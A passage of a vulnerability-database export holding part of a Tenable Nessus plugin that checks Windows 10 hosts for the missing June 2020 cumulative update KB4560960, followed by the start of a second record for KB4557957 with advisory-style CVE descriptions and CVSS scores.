attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1248)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when a\n Windows service improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1268)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Orchestrator Service improperly handles\n file operations. An attacker who successfully exploited\n this vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Update Orchestrator\n Service handles file operations. (CVE-2020-1313)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. (CVE-2020-1162,\n CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1265, CVE-2020-1282, CVE-2020-1304,\n CVE-2020-1306, CVE-2020-1334)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network List Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1209)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1277,\n CVE-2020-1302, CVE-2020-1312)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in\n OpenSSH for Windows when it does not properly restrict\n access to configuration settings. An attacker who\n successfully exploited this vulnerability could replace\n the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - A denial of service vulnerability exists when Connected\n User Experiences and Telemetry Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could cause a system to\n stop responding. (CVE-2020-1244)\n\n - An elevation of privilege vulnerability exists when the\n Windows Spatial Data Service improperly handles objects\n in memory. An attacker could exploit the vulnerability\n to overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-1441)\");\n # https://support.microsoft.com/en-us/help/4560960/windows-10-update-kb4560960\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?98e819b7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4560960.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1307\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Windows Update Orchestrator unchecked ScheduleWork call');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4560960'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18362',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4560960]) ||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18363',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4560960])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:14:13", "description": "The remote Windows host is missing security update 4557957.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - A vulnerability exists in the way the Windows Diagnostics & feedback settings app handles objects in memory. An attacker who successfully exploited this vulnerability could cause additional diagnostic data from the affected device to be sent to Microsoft.\n (CVE-2020-1296)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1261, CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)\n\n - A denial of service vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could cause a system to stop responding. (CVE-2020-1120, CVE-2020-1244)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles a process crash. An attacker who successfully exploited this vulnerability could delete a targeted file leading to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1238, CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the Windows Feedback Hub improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1199)\n\n - An information disclosure vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1206)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector fail to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when Windows Mobile Device Management (MDM) Diagnostics improperly handles junctions. An attacker who successfully exploited this vulnerability could bypass access restrictions to delete files. (CVE-2020-1204)\n\n - An elevation of privilege vulnerability exists in the way the Windows Now Playing Session Manager handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1201)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1271)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the way that the Connected Devices Platform Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when Windows Kernel fails to properly sanitize certain parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-1257, CVE-2020-1278, CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Bluetooth Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1280)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1248)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could read memory that was freed and might run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - An information disclosure vulnerability exists when a Windows service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1268)\n\n - An elevation of privilege vulnerability exists when the Windows Update Orchestrator Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Update Orchestrator Service handles file operations. (CVE-2020-1313)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability exists in Windows Security Health Service when handling certain objects in memory. (CVE-2020-1162, CVE-2020-1324)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235, CVE-2020-1282, CVE-2020-1304, CVE-2020-1306, CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when the Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when Windows Host Guardian Service improperly handles hashes recorded and logged. An attacker who successfully exploited the vulnerability could tamper with the log file. In an attack scenario, an attacker can change existing event log types to a type the parsers do not interpret allowing an attacker to append their own hash without triggering an alert. The update addresses the vulnerability by correcting how Windows Host Guardian Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network List Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1209)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1277, CVE-2020-1302, CVE-2020-1312)\n\n - An information disclosure vulnerability exists in the way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this vulnerability could determine the origin of all webpages in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when Windows Lockscreen fails to properly load spotlight images from a secure location. An attacker who successfully exploited the vulnerability could execute commands with elevated permissions. An authenticated attacker could modify a registry value to exploit this vulnerability. The security update addresses the vulnerability by ensuring that the spotlight images are always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in OpenSSH for Windows when it does not properly restrict access to configuration settings. An attacker who successfully exploited this vulnerability could replace the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when Component Object Model (COM) client uses special case IIDs. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - A denial of service vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An authenticated attacker who successfully exploited this vulnerability against an SMB Server could cause the affected system to crash. An unauthenticated attacker could also exploit this this vulnerability against an SMB client and cause the affected system to crash. (CVE-2020-1284)\n\n - A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles objects in memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge (Chromium-based) in IE Mode improperly handles specific redirects. An attacker who successfully exploits the IE Mode vulnerability could trick a user into believing that the user was on a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the Windows Shell does not properly validate file paths. An attacker who successfully exploited this vulnerability could run arbitrary code in the context of the current user. If the current user is logged on as an administrator, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with elevated privileges. Users whose accounts are configured to have fewer privileges on the system could be less impacted than users who operate with administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1258)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-10T00:00:00", "type": "nessus", "title": "KB4557957: Windows 10 Version 2004 June 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0915", "CVE-2020-0916", "CVE-2020-0986", "CVE-2020-1120", "CVE-2020-1160", "CVE-2020-1162", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1197", "CVE-2020-1199", "CVE-2020-1201", "CVE-2020-1202", "CVE-2020-1203", "CVE-2020-1204", "CVE-2020-1206", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1209", "CVE-2020-1211", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1217", "CVE-2020-1219", "CVE-2020-1220", "CVE-2020-1222", "CVE-2020-1230", "CVE-2020-1231", "CVE-2020-1232", "CVE-2020-1233", "CVE-2020-1234", "CVE-2020-1235", "CVE-2020-1236", "CVE-2020-1237", "CVE-2020-1238", "CVE-2020-1239", "CVE-2020-1241", "CVE-2020-1242", "CVE-2020-1244", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1248", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1257", "CVE-2020-1258", "CVE-2020-1259", "CVE-2020-1261", 